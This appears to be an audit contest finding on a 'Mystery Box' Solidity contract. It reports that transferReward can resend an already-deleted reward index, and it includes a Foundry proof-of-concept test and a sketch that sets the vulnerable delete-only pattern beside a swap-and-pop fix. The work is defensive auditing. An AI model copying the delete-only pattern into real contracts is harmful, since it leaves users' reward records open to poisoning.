Mystery Box

First Flight #25
Beginner Friendly, Foundry
Submission Details
Severity: medium
Valid

Transferring the same reward multiple times increases gas consumption.

Summary

A user can transfer the same reward multiple times. Although the reward is deleted in the first call, the user can make repeated transactions with the same index. These calls shouldn't go through, because the reward has already been transferred.

Vulnerability Details

IMPACT

Calling the same function without any actual reward to transfer results in high gas consumption without any definitive purpose.

POC

```solidity
// Foundry test; assumes the surrounding test contract's setUp provides
// mysteryBox, user1 and user2.
function testTransferReward_InvalidIndex() public {
    // Fund user1
    vm.deal(user1, 1 ether);
    // Buy and open five mystery boxes
    for (uint i = 0; i < 5; i++) {
        vm.startPrank(user1);
        mysteryBox.buyBox{value: 0.1 ether}();
        mysteryBox.openBox();
        vm.stopPrank();
    }
    // Transfer the reward at index 0 ten times
    for (uint i = 0; i < 10; i++) {
        vm.startPrank(user1);
        mysteryBox.transferReward(user2, 0);
        vm.stopPrank();
    }
    // user2 ends up with ten entries although only one reward was at index 0
    vm.prank(user2);
    MysteryBox.Reward[] memory rewards = mysteryBox.getRewards();
    assertEq(rewards.length, 10);
}
```

Tools Used

=> manual review

=> foundry

Recommendations

Once the user transfers a reward from an index, re-arranging the array indices should help with this issue.
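One way to re-arrange the array on transfer is swap-and-pop, shown here next to the delete-only pattern the PoC exercises. This is an added example, not the contest contract: the `Reward` fields, the `mintReward` helper, both function bodies and the contract name are assumptions; only `rewardsOwned`, `transferReward` and `getRewards` are names from the page.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Reduced model of the reward bookkeeping (illustrative, not the project's code).
contract RewardTransferSketch {
    struct Reward {
        string name;   // assumed field
        uint256 value; // assumed field
    }

    mapping(address => Reward[]) public rewardsOwned;

    // Hypothetical helper so the sketch can be exercised: give the caller one reward.
    function mintReward(string calldata name, uint256 value) external {
        rewardsOwned[msg.sender].push(Reward(name, value));
    }

    // Delete-only pattern: `delete` zeroes the slot but keeps the array length,
    // so the same index passes the bounds check again and every repeat call
    // pushes an empty Reward into the recipient's array.
    function transferRewardDeleteOnly(address to, uint256 index) external {
        require(index < rewardsOwned[msg.sender].length, "Invalid index");
        rewardsOwned[to].push(rewardsOwned[msg.sender][index]);
        delete rewardsOwned[msg.sender][index];
    }

    // Swap-and-pop: move the last element into the vacated slot and shrink the
    // array, so a transferred reward cannot be sent a second time and no empty
    // slots accumulate.
    function transferRewardSwapAndPop(address to, uint256 index) external {
        Reward[] storage mine = rewardsOwned[msg.sender];
        require(index < mine.length, "Invalid index");
        rewardsOwned[to].push(mine[index]);
        uint256 last = mine.length - 1;
        if (index != last) {
            mine[index] = mine[last];
        }
        mine.pop();
    }

    function getRewards() external view returns (Reward[] memory) {
        return rewardsOwned[msg.sender];
    }
}
```

Swap-and-pop changes the order of the remaining rewards, so callers must re-read their indices after each transfer. With this variant, the eleventh call in a loop like the PoC's reverts with "Invalid index" once the sender's array is empty.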

Updates

Appeal created

inallhonesty Lead Judge 11 months ago
Submission Judgement Published
Validated
Assigned finding tags:

A user can poison the `rewardsOwned` of another user via `transferReward` of an empty reward index
